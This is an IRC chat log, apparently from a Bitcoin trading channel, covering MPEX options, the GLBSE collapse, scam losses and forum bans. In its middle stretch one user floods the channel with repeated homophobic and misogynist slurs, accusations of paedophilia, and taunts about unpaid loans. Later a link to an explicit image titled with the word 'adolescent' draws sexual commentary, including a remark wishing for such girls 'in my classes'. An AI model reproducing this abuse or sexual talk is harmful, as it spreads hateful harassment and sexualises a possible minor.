04:20:57 nobody is trying because there's nothing to try. Oct 25 04:21:20 its not about winning its about the war Oct 25 04:21:58 if the war was won there would need to be another war which is just more work, best keep no winning the existing ones Oct 25 04:25:37 mircea_popescu: so will there ever be intermediate options? Oct 25 04:25:44 like 9.50 Oct 25 04:25:47 or 10.50 etc Oct 25 04:25:55 there were. Oct 25 04:26:12 a few months ago btc was ~5 and options went 1 to 10 at a .5 step Oct 25 04:26:57 people who did puts at 12 before the glbbq fiasco.... Oct 25 04:27:00 lucky bastards Oct 25 04:27:11 lol Oct 25 04:27:20 back in august i actually booked a ~4k loss Oct 25 04:27:26 due to that post-pirate slosh Oct 25 04:28:45 given MPOE is the options broker, would you ever let third parties exercise the options? Oct 25 04:28:52 to like hedge your risks? Oct 25 04:29:00 err Oct 25 04:29:01 sell* Oct 25 04:29:18 of course ? Oct 25 04:29:29 there's both a mkopt and a split option implemented, you know this ? Oct 25 04:29:45 I'm accessing via coinbr Oct 25 04:29:57 I don't have enough cashflow for a legit account Oct 25 04:30:03 i think jurov has those too neh ? Oct 25 04:30:35 Don't think he put in MKOPT Oct 25 04:30:38 (then again, if you don't have the cash flow to go directly to mpex it may be the case you're not well served by underwriting options) Oct 25 04:31:12 underwriting in what sense? Oct 25 04:31:55 when you create and sell an option Oct 25 04:31:59 this is called underwriting Oct 25 04:32:24 I usually relate underwriting to insurance Oct 25 04:32:33 I personally wouldn't sell contracts Oct 25 04:32:37 I would buy them Oct 25 04:32:54 a well if you buy them then im sure coinbr has buy.sell Oct 25 04:34:30 yea Oct 25 04:34:41 I guess I'm overanalyzing. Oct 25 04:34:45 Sorry for being dumb Oct 25 04:35:42 lot of people wanting to call at $12 Oct 25 04:43:26 eh asking q's isn't that dumb. Oct 25 04:44:40 i guess refusing to listen is dumb Oct 25 04:45:40 [MPEX] [S.MPOE] 16475 @ 0.0004338 = 7.1469 BTC [-] Oct 25 04:45:42 [MPEX] [S.MPOE] 7465 @ 0.00043351 = 3.2362 BTC [-] Oct 25 04:45:43 [MPEX] [S.MPOE] 6038 @ 0.00043336 = 2.6166 BTC [-] Oct 25 04:45:44 [MPEX] [S.MPOE] 2822 @ 0.00043313 = 1.2223 BTC [-] Oct 25 04:46:13 ugh Oct 25 04:46:26 i shouldn't have bought at 436 Oct 25 04:47:04 ahahah Oct 25 04:47:20 man, nobody succeeds in timing the market. Oct 25 04:48:12 not in bitcoin world Oct 25 04:48:18 not as easy as AAPL Oct 25 04:48:50 there was a guy talking about buying puts on aapl today Oct 25 04:49:09 740 -> 640 in < 1 month Oct 25 04:49:20 lemme dig Oct 25 04:49:59 not on irc Oct 25 04:50:03 on the tv Oct 25 04:50:04 lol Oct 25 04:50:10 Then i told chaang noi while you weren't here Oct 25 04:50:11 lol Oct 25 04:53:52 so Oct 25 04:54:03 jonathanDoe is flooding Oct 25 04:54:09 JonathanDoe: stop flooding Oct 25 04:54:17 kakobreklaaa: ^ Oct 25 04:54:21 fuck urself Oct 25 04:54:23 fuck urself Oct 25 04:54:26 fuck urself Oct 25 04:54:26 fuck urself Oct 25 04:54:27 fuck urself Oct 25 04:54:28 fuck urself Oct 25 04:54:48 are there any ops to ban him? Oct 25 04:55:04 maybe gcrackswell Oct 25 04:55:06 maybe gcrackswell Oct 25 04:55:07 maybe gcrackswell Oct 25 04:55:09 and cunt-jr Oct 25 04:55:12 and cunt-jr Oct 25 04:55:12 and cunt-jr Oct 25 04:55:13 and cunt-jr Oct 25 04:55:13 and cunt-jr Oct 25 04:55:14 and cunt-jr Oct 25 04:55:19 fuckin pedophile and sister fucker Oct 25 04:55:20 fuckin pedophile and sister fucker Oct 25 04:55:21 fuckin pedophile and sister fucker Oct 25 04:55:21 fuckin pedophile and sister fucker Oct 25 04:56:19 wiw, maybe supadupa was right all along. we're too hard on him. he's just misunderstood. Oct 25 04:56:29 are you mad about something or just bored? Oct 25 04:56:45 I'm not Bi-Polar I'm Bi-Winning! Oct 25 04:56:47 I'm not Bi-Polar I'm Bi-Winning! Oct 25 04:56:48 I'm not Bi-Polar I'm Bi-Winning! Oct 25 04:56:48 I'm not Bi-Polar I'm Bi-Winning! Oct 25 04:56:49 I'm not Bi-Polar I'm Bi-Winning! Oct 25 04:56:55 and By-Winning! Oct 25 04:57:06 I'm tired of pretending that my life is not WINNING! Oct 25 04:57:11 every second of the day WINNING! Oct 25 04:57:14 can't handle this losers Oct 25 04:57:18 winning! Oct 25 04:57:24 Sound's like you are a loser :) Oct 25 04:57:29 buy bye! Oct 25 04:57:42 buh* Oct 25 04:57:59 hey gcrackswell Oct 25 04:58:03 wsup faggot? Oct 25 04:58:05 hey gcrackswell Oct 25 04:58:06 wsup faggot? Oct 25 04:58:08 hey gcrackswell Oct 25 04:58:08 wsup faggot? Oct 25 04:58:09 hey gcrackswell Oct 25 04:58:10 wsup faggot? Oct 25 04:58:12 hey gcrackswell Oct 25 04:58:13 wsup faggot? Oct 25 04:58:14 hey gcrackswell Oct 25 04:58:16 wsup faggot? Oct 25 04:58:17 hey gcrackswell Oct 25 04:58:18 wsup faggot? Oct 25 04:58:18 hey gcrackswell Oct 25 04:58:20 SupaDupa, pls stop Oct 25 04:58:21 wsup faggot? Oct 25 04:58:21 hey gcrackswell Oct 25 04:58:22 wsup faggot? Oct 25 04:58:22 hey gcrackswell Oct 25 04:58:23 SupaDupa, pls stop Oct 25 04:58:29 LOL Oct 25 04:58:30 haha Oct 25 04:58:32 flooded out Oct 25 04:58:45 he does that a lot too. Not even a very competent flooder. :( Oct 25 04:58:53 haha Oct 25 04:59:31 fuckin faggot... Oct 25 04:59:39 sister fucking fucking cunt Oct 25 04:59:42 Supa Oct 25 04:59:46 what? Oct 25 04:59:46 someone needs a hug Oct 25 04:59:49 this is why you cant get bitcoins Oct 25 04:59:51 I need 5 bitcoins Oct 25 04:59:57 be nice then Oct 25 04:59:59 everyone can suck my balls Oct 25 05:00:04 and maybe peope will trade Oct 25 05:00:07 besides xisalty Oct 25 05:00:09 and cyco Oct 25 05:00:11 and abbeytim Oct 25 05:00:13 Well technically you need a lot more than 5 BTC. Oct 25 05:00:15 and a few others Oct 25 05:00:20 pay back loans too Oct 25 05:00:22 stfu faggot Oct 25 05:00:25 no one is talking to you Oct 25 05:00:32 @gcrackswell Oct 25 05:00:45 ^this behaivoiur Oct 25 05:00:53 plz stahp Oct 25 05:00:58 SupaDupa the loan defaulter Oct 25 05:01:02 ur mom Oct 25 05:01:05 pay back your loans dead beat Oct 25 05:01:06 get a job Oct 25 05:01:06 is a loan defaulted Oct 25 05:01:06 he paid back mine on default Oct 25 05:01:09 with extra Oct 25 05:01:14 I loaned her my balls she never gave back Oct 25 05:01:26 WHAT THE FUCK DO YOU THINK I'M TRYING TO DO FAGGOT! Oct 25 05:01:39 gtfo bitskankly Oct 25 05:01:45 ur food is shit Oct 25 05:01:52 and so is your husband Oct 25 05:03:21 I hope you're no older than 18 Oct 25 05:03:28 I'm 25 Oct 25 05:03:29 if so, society has really crumbled Oct 25 05:03:30 but it's ok Oct 25 05:03:32 I'm built good Oct 25 05:03:35 so you're a manchild Oct 25 05:03:46 ur mom is a manchild Oct 25 05:04:29 a 25 year old with a 9 year old's mind Oct 25 05:04:41 I have an IQ of 186 Oct 25 05:04:53 and I piss SQL and shit Source Code Oct 25 05:05:00 thestringpuller: good, thats the right technique, no words with more than 4 letters. Oct 25 05:05:32 so clever. he joins and then leaves Oct 25 05:05:43 for someone that has such a high IQ he has so much problems getting money xD Oct 25 05:05:57 he's homeless and bored Oct 25 05:05:58 Azelphur: I think this is the IRC version of flinging poop. Oct 25 05:06:03 probably logged in at some starbucks Oct 25 05:06:05 gmaxwell: indeed Oct 25 05:07:32 lol Oct 25 05:07:35 where are the opz Oct 25 05:07:43 interesting that xisalty vanished at the same time... Oct 25 05:07:46 call upon the freenode ops Oct 25 05:07:49 for someone with a 186 iq he has a big problem understanding sendq Oct 25 05:07:54 sendq Oct 25 05:07:55 lol Oct 25 05:07:59 I'm a legend everywhere that I go , every botnet distro , every bitcoin ho losing their coins yo! Oct 25 05:07:59 I'm a legend everywhere that I go , every botnet distro , every bitcoin ho losing their coins yo! Oct 25 05:07:59 I'm a legend everywhere that I go , every botnet distro , every bitcoin ho losing their coins yo! Oct 25 05:07:59 I'm a legend everywhere that I go , every botnet distro , every bitcoin ho losing their coins yo! Oct 25 05:07:59 I'm a legend everywhere that I go , every botnet distro , every bitcoin ho losing their coins yo! Oct 25 05:07:59 I'm a legend everywhere that I go , every botnet distro , every bitcoin ho losing their coins yo! Oct 25 05:07:59 I'm a legend everywhere that I go , every botnet distro , every bitcoin ho losing their coins yo! Oct 25 05:08:05 sigh Oct 25 05:08:06 kakobreklaaa Oct 25 05:08:08 yep, still has problems xD Oct 25 05:08:14 Azelphur: IQ is relative to a population, the reference point for him is a chimp. Oct 25 05:08:20 gmaxwell: ah :) Oct 25 05:08:27 :P mighty smart chimp! Oct 25 05:08:28 Why can't we have smart scammers Oct 25 05:08:32 and smart criminals Oct 25 05:08:36 like pablo escobar Oct 25 05:08:37 he's failing rather miserably at being a good spammer Oct 25 05:08:44 thestringpuller: no natural selection for that. Oct 25 05:09:00 thestringpuller: isn't that pirateat40 Oct 25 05:09:10 pirateat40 is going to jail for tax evasion Oct 25 05:09:18 smart scammer Oct 25 05:09:18 :P Oct 25 05:09:22 Azelphur: the guy with the totally transparent scam? He said smart, not effective.. and thats the point. Oct 25 05:09:29 lol Oct 25 05:09:36 he's actually going to jail now? Oct 25 05:09:48 Crime against humanity. You all are aware right? Oct 25 05:09:54 Can't stop lending me coins and never gettin them back! All the the fuckin bitcoin noobs fists wrapped around my sack! Oct 25 05:10:13 You have no nuts. Oct 25 05:10:20 thestringpuller: he is? haha, i've been out of the loop Oct 25 05:10:20 Supa Oct 25 05:10:20 lol Oct 25 05:10:24 Why are those coins gone in the first place? Oct 25 05:10:33 You were neutered as a child to prevent stupidity from running rampant in this world. Oct 25 05:10:41 Can't stop lending me coins and never gettin them back! All the the fuckin bitcoin noobs fists wrapped around my sack! Oct 25 05:10:41 Can't stop lending me coins and never gettin them back! All the the fuckin bitcoin noobs fists wrapped around my sack! Oct 25 05:10:41 Can't stop lending me coins and never gettin them back! All the the fuckin bitcoin noobs fists wrapped around my sack! Oct 25 05:10:41 Can't stop lending me coins and never gettin them back! All the the fuckin bitcoin noobs fists wrapped around my sack! Oct 25 05:10:51 [MPEX] [S.MPOE] 4800 @ 0.00043539 = 2.0899 BTC [+] Oct 25 05:10:59 finally mpoe goes up Oct 25 05:11:00 Why are those coins gone in the first place? Supa? Oct 25 05:11:07 cause Oct 25 05:11:11 I didn't pay them back Oct 25 05:11:12 cause you're dumb Oct 25 05:11:14 and can't pay them back Oct 25 05:11:16 thestringpuller: they knew that all the girls go for a guy with explosive IRC flooding. Oct 25 05:11:17 and spent it on heroin Oct 25 05:11:17 Why did you have to spend them? Oct 25 05:11:18 and won't pay them back Oct 25 05:11:38 mmm heroin Oct 25 05:11:41 you know it dude Oct 25 05:12:01 http://supa.fii.me/BitcoinLoansNEW.txt Oct 25 05:12:04 SupaDupa: see a doctor, seriously Oct 25 05:12:08 http://supa.fii.me/BitcoinLoansOLD.txt Oct 25 05:12:10 already did Oct 25 05:12:14 doctor says I'm crazy Oct 25 05:12:18 gave me some happy bills and shit Oct 25 05:12:37 careful loading those links people. Oct 25 05:12:43 load via tor only. Oct 25 05:12:52 they don't resolve Oct 25 05:13:01 nslookup lol Oct 25 05:13:07 http://supa.fii.me/PayPalLoans.txt Oct 25 05:13:20 they resolve just fine cunt Oct 25 05:13:24 The name resolves. Oct 25 05:13:29 what about litecoin loans? Oct 25 05:13:34 http://supa.fii.me/LitecoinLoans.txt Oct 25 05:13:38 there Oct 25 05:13:49 why would anyone lend this guy money? Oct 25 05:14:06 was he a nice guy a long time ago in a galaxy far away? Oct 25 05:14:32 If he was Oct 25 05:14:36 Why wouldnt he be anymore? Oct 25 05:15:14 cause I'm CRAZYYYYY! Oct 25 05:15:17 Don't mind if I do! Oct 25 05:15:42 he's probably just some kid that doesn't get enough attention so goes looking for it on IRC Oct 25 05:15:44 EskimoBob: translation in pm Oct 25 05:15:45 I feel sorry for him Oct 25 05:15:53 smickles! Oct 25 05:15:59 my all time favorite person Oct 25 05:16:01 :D Oct 25 05:16:50 Keep it up guys Oct 25 05:16:57 You keep screwing with supa you wont see any of those loans Oct 25 05:17:03 Best not to poke the people that have your money Oct 25 05:17:11 just write it off and make more money Oct 25 05:17:22 there is such thing as an "acceptable loss" Oct 25 05:18:03 thestringpuller: because he's nice for ten minute spans of time, and evades the bans and not everone knows about this BS. Oct 25 05:20:37 mircea_popescu: i threw an upvote at that reddit link Oct 25 05:20:42 bah i ain' finding it. Oct 25 05:20:46 smickles remember http://trilema.com/2012/finante-inalte-2/ ? Oct 25 05:21:15 $8.20 more paid off Oct 25 05:21:18 http://supa.fii.me/PayPalLoans.txt Oct 25 05:22:55 SupaDupa!*@* added to ignore list. Oct 25 05:22:59 lol, some action here now... not what i expected, though it never is in btc land Oct 25 05:24:10 If I recall his girlfriend told him that they couldnt get their cat back unless he got away from his parents or something. Oct 25 05:24:27 mircea_popescu: heh, that's a nice image in that article Oct 25 05:24:33 :) Oct 25 05:24:37 So he spent people's money trying to get away from their abuse, but they followed him, so now he's apparently losing his shit. Oct 25 05:24:56 trying to dig up an old post for to show thestringpuller but fuck me if i can find anything in my blog ;/ Oct 25 05:25:24 mircea_popescu: and now, for perspective, over 3/4 'cashed out' before glbse went down, and I still have 38 (or so) btc to distribute Oct 25 05:25:39 teh stuff legends are made of Oct 25 05:25:41 * smickles is now known as FooDSt4mP Oct 25 05:25:42 * FooDSt4mP is now known as smickles :O Oct 25 05:25:47 smickles: what's that for, MPOE? Oct 25 05:25:51 be careful :P Oct 25 05:25:52 Azelphur: yeah Oct 25 05:25:58 smickles: you got shareholder data? Oct 25 05:26:14 noagendamarket: in the context of the time, it was a funny and easily understandable joke ;) Oct 25 05:26:22 :) Oct 25 05:26:28 aaa found it. thestringpuller re AAPL etc : http://polimedia.us/dtng/c/res/14744.html Oct 25 05:27:00 Azelphur: not that I know of, i'll check for emails Oct 25 05:27:25 smickles: ah, was just asking because you said you are distributing btc Oct 25 05:28:04 lol check mail Oct 25 05:28:05 Azelphur: last email from glbse was on oct 14 Oct 25 05:28:14 We regret to inform you that GPUMAX will be permanently closing Oct 25 05:28:17 well derp Oct 25 05:28:19 old news ? Oct 25 05:28:23 yeah Oct 25 05:28:24 dub:old news is old Oct 25 05:28:32 yea, I wish nefario would hurry up already Oct 25 05:28:44 yes well nefario is the only other person with this address Oct 25 05:29:06 Azelphur: I think glbse confused you ;) they gave some btc back, so i have it to distribute, but no info to perform that action Oct 25 05:29:06 my address is my hostname Oct 25 05:29:11 not much need to check daily Oct 25 05:29:21 smickles: ah, I see Oct 25 05:29:27 I don't understand the delay at all Oct 25 05:29:41 me either Oct 25 05:29:53 dub: indeed, at this rate it's sounding like I'll need one Oct 25 05:30:17 here's a question, what do i do with the btc when nef doesn't ever give out shareholder info? Oct 25 05:30:18 by pirate I'm down ~150, by GLBSE I'm (currently) down about 500, and clipse got me for ~50 Oct 25 05:30:23 clipse ?! Oct 25 05:30:29 mircea_popescu: yep Oct 25 05:30:35 fill me in Oct 25 05:30:36 im into clipse for ~30 Oct 25 05:30:40 mircea_popescu: he's scammer tagged now Oct 25 05:30:43 he stole miner funds Oct 25 05:30:47 how ? Oct 25 05:30:54 by...not giving them to us Oct 25 05:30:55 and leaving Oct 25 05:30:56 ran a pps+ 'mining pool' that turned out to probably have just been a PPT Oct 25 05:31:05 dub yes ok, but.. no daily payout ? Oct 25 05:31:10 the age old "Lol I've got your money goodbye" attack Oct 25 05:31:20 it was for a while, then problems its coming soon, then nothing Oct 25 05:31:26 heh mk. Oct 25 05:31:45 mircea_popescu: you friends with him / have his address? people want to go after him legally Oct 25 05:31:52 i don't even know who he is Oct 25 05:31:57 ah Oct 25 05:32:00 (i'm not a miner so i'm a little out of that loop) Oct 25 05:32:04 hehe Oct 25 05:32:07 ;;gpg info clipse Oct 25 05:32:08 No such user registered. Oct 25 05:32:12 :o Oct 25 05:32:19 if GLBSE screws me as well, I'll be pretty bummed Oct 25 05:32:28 because that'll be pretty much all my money gone \o/ Oct 25 05:32:37 :( Oct 25 05:32:40 look on the bright side : you saved 20 btc on a mpex acct. Oct 25 05:32:41 :( indeed Oct 25 05:32:53 I have 20btc on mpex? o.O Oct 25 05:33:07 no, i mean, by not getting one, you saved 20 btc. Oct 25 05:33:18 you didn't hear? glbse lost the rest of the funds and database to a chinese relic hunter who guessed their mtgox api key Oct 25 05:33:22 I have a MPEx account xD Oct 25 05:33:26 but you gave me it for free in the early days Oct 25 05:34:01 I have 11465 satoshidice shares, \o/ Oct 25 05:34:02 pigeons: its ok, if neafrio asks real nice he'll give it back Oct 25 05:34:16 have they gone up much since the ipo? Oct 25 05:34:35 no but they pay dividends Oct 25 05:34:51 Azelphur a ok! Oct 25 05:34:53 forgot lol Oct 25 05:35:06 nah, about the same Oct 25 05:35:08 !ticker s.dice Oct 25 05:35:10 [MPEX:S.DICE] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0001 / 0.00298639 / 0.0034 (2013520 shares, 6,013.16 BTC) Oct 25 05:35:16 actually a little under Oct 25 05:35:23 \o/ Oct 25 05:36:00 me and investments clearly wern't meant to mix Oct 25 05:36:10 [MPEX] [S.MPOE] 31576 @ 0.00043313 = 13.6765 BTC [-] Oct 25 05:42:32 hmm goat got banned from bitcointalk Oct 25 05:42:46 whats up with that ? Oct 25 05:43:06 o ? Oct 25 05:44:23 https://bitcointalk.org/index.php?topic=120102.0 Oct 25 05:44:33 its a perma-ban Oct 25 05:45:00 is this some sort of new policy ? Oct 25 05:45:17 when you threaten to sue theymos it is Oct 25 05:45:35 why are we threatening to sue theymos? Oct 25 05:45:40 yeah dont threaten to sue theymos lol Oct 25 05:45:52 we're not. goat is because theymos was involved in glbse Oct 25 05:45:53 odd tho, did he also ban my pr girl ? Oct 25 05:46:06 doubt it Oct 25 05:46:18 well then wtf, she STARTED the give theymos a scammer tag thread Oct 25 05:46:30 they banned rarity for posting in it ? Oct 25 05:46:38 sorry, even your girl isn't as trolly as goat Oct 25 05:46:53 my girl isn't trolly at all Oct 25 05:46:59 lol Oct 25 05:47:01 she just gets people's goat. Oct 25 05:47:32 notsureifserious Oct 25 05:47:40 or mircea_popescu Oct 25 05:47:54 lol Oct 25 05:48:44 kinda weaksauce drama tho. Oct 25 05:49:04 i mean, can we stoop to "why was x banned" level after the "omg, 6mn in bitcoins stoled" this august ?! Oct 25 05:49:10 i think i got banned cuz i told theymos he was wrong in telling people not to send back the double paymensts they got from nefario Oct 25 05:49:28 did you threaten to sue ? Oct 25 05:49:39 i did not Oct 25 05:49:52 i said people had the options to sue glbse owner Oct 25 05:50:01 theymos thinks he is protected, but he is not Oct 25 05:50:08 well had had atleast... Oct 25 05:50:17 he said it was unfair he is liable for nefarios actions Oct 25 05:50:33 i also questioned that since nefario had over 50% of the vote why he could not shut down glbse Oct 25 05:50:52 i think theymos has gone a bit crazy with the scammer tag/bann hammer abuse cuz of his stress with glbse Oct 25 05:51:00 he i acting like nefario lol Oct 25 05:51:03 is* Oct 25 05:51:03 technically Magical Tux is allowing unlicensed securities to be promoted on his forum. Oct 25 05:51:28 yeah, i paid for advertising there Oct 25 05:51:32 why would you tell people not to return the double payments? Oct 25 05:51:32 for them Oct 25 05:51:47 i did not, THEYMOS told people not to return double payments Oct 25 05:51:51 i said theymos was wrong Oct 25 05:51:53 oh, wow Oct 25 05:51:55 ya but why ? Oct 25 05:51:56 yeah Oct 25 05:51:58 yea, theymos is getting really odd Oct 25 05:52:02 yeah theymos told people not to return payments Oct 25 05:52:03 then i get perma banned Oct 25 05:52:16 really theymos can fuck himself Oct 25 05:52:21 and marked as a scammer? Oct 25 05:52:27 he is trying to make the glbse situation drag out Oct 25 05:52:31 im not a scammer Oct 25 05:52:33 no scammer tag Oct 25 05:52:36 ah Oct 25 05:52:38 just perrma banned Oct 25 05:52:47 no warning or explination Oct 25 05:52:55 fun Oct 25 05:53:06 seems you can do anything on that forum other than tell theymos when he fucked up Oct 25 05:53:10 oh well Oct 25 05:53:45 this theory suffers of the fact that they've not banned my girl. Oct 25 05:53:46 I'm starting to notice in the bitcoin community there so many people who think they are immune to the law Oct 25 05:54:00 yeah Oct 25 05:54:31 well...the police dont even investigate if your house gets burgled why would they care if your bitcoins get stolen ? Oct 25 05:54:43 there are differnt levels of police Oct 25 05:54:49 the SEC does care Oct 25 05:54:52 depends where. here they investigate. Oct 25 05:54:53 not really lol Oct 25 05:54:55 noagendamarket: you can bet they will start caring about unlicensed securities Oct 25 05:55:31 unlicensed securities, tax avoidance and money laundering yes Oct 25 05:55:40 yea Oct 25 05:55:47 that leaked shareholder info was ridiculous Oct 25 05:56:00 noagendamarket: I got burgled a couple years back, the dude then tried to fraud my bank using a debit card in mail I'd never opened Oct 25 05:56:10 :O Oct 25 05:56:18 leaked shareholder info? Oct 25 05:56:23 on glbse or glbse assets? Oct 25 05:56:30 why is it that EVE and secondlive companies get a pass Oct 25 05:56:35 (from the sec) Oct 25 05:56:39 Chaang-Noi: I mean the meeting, sorry for being unclear Oct 25 05:56:49 smickles because they dont exist physically Oct 25 05:56:58 noagendamarket: bank calls me out of the blue 'mr x your card replacement card is with a courier it will be iwth you shortly', I go 'oh good please confirm the address',, call cops with current location of burglar. carefactor 0 Oct 25 05:57:03 we don't exist physically? Oct 25 05:57:07 ahh, i loled when that guy posted that meeting on the forum, i think thats why i got perma banned to, cuz i read it and said how week it made them all look. Oct 25 05:57:37 noagendamarket: they called me back 6 weeks later Oct 25 05:57:38 Chaang-Noi: xD Oct 25 05:57:47 noagendamarket: that doesn't make much sense, the people running them exist physically Oct 25 05:58:12 and if it's 'physicality' that is the bar, s2cm and mpoe.etf were gold Oct 25 05:58:15 yeah but second life isnt going to affect tyhe central bankers lol Oct 25 05:58:17 not if they are female smickles :) Oct 25 05:58:33 1. they are simulations and games. 2. the amounts of value are relatively small Oct 25 05:58:41 I know a guy who sold his house, put the money in his bank, and when he presented his passport to the bank to show ID for a large deposit, they took it and scanned it. Later someone walked in complete with a fake passport and cleaned out his account for £150k iirc Oct 25 05:58:43 2 can never be a point pigeons. Oct 25 05:58:52 julian assange didnt get charges untill wikileaks embarrassed the bankers Oct 25 05:58:53 it is always a point mircea_popescu Oct 25 05:59:06 show me a law that says it's ok to steal as long as you don't steal a lot. Oct 25 05:59:10 He was lucky, he went to make a cash withdrawal and his account balance was zero and the bank was able to stop the transaction before it left the country, he got all his money back Oct 25 05:59:11 the whole law on whether you are a msb in usa for example is if you are under X a day Oct 25 05:59:19 was apparently about an hour away from leaving the country Oct 25 05:59:22 o, we're talking usa again ? Oct 25 05:59:26 what's with this obsession. Oct 25 05:59:35 we aren't talking about stealing, we are talking about your papers please Oct 25 05:59:57 myeah. Oct 25 06:00:37 technically its not stealing when you hand your cash over to someonbe voluntarily Oct 25 06:00:47 just fraud Oct 25 06:00:51 well im not talking about fraud either Oct 25 06:00:51 yes Oct 25 06:00:56 im sorry to burst everyone's bubble, but contrary to the widely held belief in conspiratist circles, enforcement of the various financial regulations is traditionally very softgloved. Oct 25 06:01:10 [22:59:37] papers please Oct 25 06:01:13 OMG FASCIST Oct 25 06:01:15 [MPEX] [S.MPOE] 8429 @ 0.00043539 = 3.6699 BTC [+] Oct 25 06:01:25 YES Oct 25 06:01:33 go up Oct 25 06:01:33 NAZI SOCIALIST COMMUNIST Oct 25 06:01:42 lol mpoe has a fan Oct 25 06:01:52 don't leave it on overnight Oct 25 06:01:53 you might die Oct 25 06:01:59 !ticker s.dice Oct 25 06:02:01 [MPEX:S.DICE] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0001 / 0.00298639 / 0.0034 (2013520 shares, 6,013.16 BTC) Oct 25 06:02:02 If I was nefario and my lawyer told me that it was time to shut down or face possible jail time, I'd be shutting down too Oct 25 06:02:04 why are we arguing about it ewhen they are about to start flying 30 000 drones over the citizens lol Oct 25 06:02:12 lol at fan joke :) Oct 25 06:02:47 copumpkin that korea thing ? Oct 25 06:02:49 insanity. Oct 25 06:02:54 oppan gangnam style Oct 25 06:02:57 but yeah Oct 25 06:03:01 Azelphur there is no proof he even spoke to one lol Oct 25 06:03:14 inb4 tinfoil hat Oct 25 06:03:29 noagendamarket: indeed, but it's fairly obvious that he did Oct 25 06:03:33 no but think about it. ask any lawyer if it is "advisable" to drive your car Oct 25 06:03:45 its fairly obvious he is super fucking paranoid Oct 25 06:03:45 he'll tell you that well... you face possible jail time and ideally you should not drive your car Oct 25 06:03:48 WHICH IS TRUE Oct 25 06:04:23 also he's lazy and cbf dealing with it anymore. Oct 25 06:04:30 people somehow irresponsibly don't seem to retain a lawyer to ask this. Oct 25 06:04:34 the problem isnt that he shut down, the main problem is that he did it without returning accounting to asset holders or even all the funds, and that he dicked around with his shoe on head picture bullshit Oct 25 06:04:53 pigeons the problem is that he lied. Oct 25 06:05:02 ? Oct 25 06:05:11 this culture of lieing (about pretty much everything) is the fucking problem. Oct 25 06:05:19 I agree Oct 25 06:05:24 he lied about talking to a lawyer. he lied about even having wtf any clue whatsoever what he's doing. Oct 25 06:05:29 the problem is that he didn't return asset lists or money Oct 25 06:05:36 no, the problem is he lied Oct 25 06:05:40 it is just a string of lies all the way through. review his fucking videos at that ridiculous conference nobody went to. Oct 25 06:05:41 glbse was never legal Oct 25 06:05:49 wait Oct 25 06:05:55 he posted a pic of himself with a shoe on his head? Oct 25 06:05:56 glbse was just an elaborate fundraiser for nefario's sexchange operation and therapist fees Oct 25 06:05:56 and he said it was to get asset issuers Oct 25 06:06:02 pretty much all the guy does is lies and somehow this has become "the norm". Oct 25 06:06:03 mircea_popescu: I never lie! Oct 25 06:06:05 >_> Oct 25 06:06:11 lieing sucks, but he needs to give people their bitcoins back and the asset issuers information about their assets Oct 25 06:06:13 look at the wannabe entrepreneurs in the forum : THEY ALL LIE Oct 25 06:06:21 copumpkin ya but you also never say much. Oct 25 06:06:24 :( Oct 25 06:06:30 you think I say meaningless shit Oct 25 06:06:33 start a btc-corp, get back to me, then it'd be useful. Oct 25 06:06:34 (I think I say meaningless shit) Oct 25 06:06:35 you lied about pirate's sister, liar! Oct 25 06:06:40 lol Oct 25 06:06:44 him or me ? Oct 25 06:06:47 me Oct 25 06:06:52 I'm famous for it Oct 25 06:06:52 you fucked her too ?! Oct 25 06:06:55 yeah Oct 25 06:06:58 asshole Oct 25 06:07:02 genjix and nefario are working in tandem Oct 25 06:07:02 someone brought it up recently again on the forum Oct 25 06:07:09 as an example of maged abusing his power as a mod Oct 25 06:07:09 maged was gonna give him a scameer tag for saying he fucked pirate's sister Oct 25 06:07:15 agagagaa Oct 25 06:07:20 was she hot? Oct 25 06:07:22 that's why I quit the forum :P Oct 25 06:07:23 and hashking for falsely claiming he's 15 ? Oct 25 06:07:25 lol Oct 25 06:07:33 he doesn't have a sister i think Oct 25 06:07:38 sure he does Oct 25 06:07:42 so it was just pirate in drag? Oct 25 06:07:45 sure de hoes* Oct 25 06:08:01 bahhaha Oct 25 06:08:05 mircea_popescu: do you know house of gord? Oct 25 06:08:30 nope ? Oct 25 06:08:33 ah Oct 25 06:08:53 http://trilema.com/wp-content/uploads/2012/02/adolescenta-si-clitoris.gif random pic of the day Oct 25 06:08:57 with animation! Oct 25 06:09:05 copumpkin: http://static.neatorama.com/images/2007-10/pumpkin-house-steve-miller.jpg Oct 25 06:09:10 house of gord Oct 25 06:09:18 hahah Oct 25 06:09:25 *gourd Oct 25 06:09:26 mircea_popescu: http://www.markydsade.com/wp-content/uploads/2008/01/gord1_500x333.jpg Oct 25 06:09:35 badbear brought up the sister thing when attacking maged Oct 25 06:09:46 it was lols globol mod on global mod action Oct 25 06:09:48 the fuck Oct 25 06:09:58 http://alterpic.files.wordpress.com/2010/03/invertedtruck-143.jpg Oct 25 06:10:00 now maged is upset at theymos for not talking about or warning maged i was banned, not sure why Oct 25 06:10:03 o i c. femsploitation! Oct 25 06:10:04 that was the most random picture ever Oct 25 06:10:05 copumpkin: yeah, i know, this ( http://waynesword.palomar.edu/images/pgourd3b.jpg ) is really the house of gourd Oct 25 06:10:08 HE IS GORD Oct 25 06:10:11 so she's fingering herself Oct 25 06:10:16 then sniffing it? Oct 25 06:10:22 thestringpuller something like that Oct 25 06:10:31 maybe was just checking the temperature who knows Oct 25 06:10:45 i wish I had girls like that in my classes Oct 25 06:10:58 you do. Oct 25 06:11:05 "that" is how girls are. Oct 25 06:11:13 http://media.gordstore.com/media/items/0830/MG-100-347a_t.jpg http://media.gordstore.com/media/items/0510/MY-01-054_t.jpg Oct 25 06:11:16 lol, what is this http://www.houseofgord.com/nav/pornopolice.png Oct 25 06:11:21 he's pretty famous Oct 25 06:11:40 SupaDupa: no Oct 25 06:11:56 lol Oct 25 06:12:03 that's ciuciu's new venture Oct 25 06:12:09 mircea_popescu: the womanchariot? Oct 25 06:12:09 i challenge you to SupaDupa Oct 25 06:12:17 no, pornopolice Oct 25 06:12:20 oh Oct 25 06:12:29 I bet ciuciu secretly rides chariots of women Oct 25 06:12:34 perhaps he even has binders of them Oct 25 06:12:34 nice Oct 25 06:12:41 i bet he secretly rides chariots of mcdo garbage Oct 25 06:13:21 EskimoBob also likes chariots of women Oct 25 06:13:38 or gord's weird vehicle attachments Oct 25 06:14:14 i used to date a hood ornament Oct 25 06:14:19 ;;ticker Oct 25 06:14:20 BTCUSD ticker | Best bid: 11.56112, Best ask: 11.60000, Bid-ask spread: 0.03888, Last trade: 11.60001, 24 hour volume: 21461.38961651, 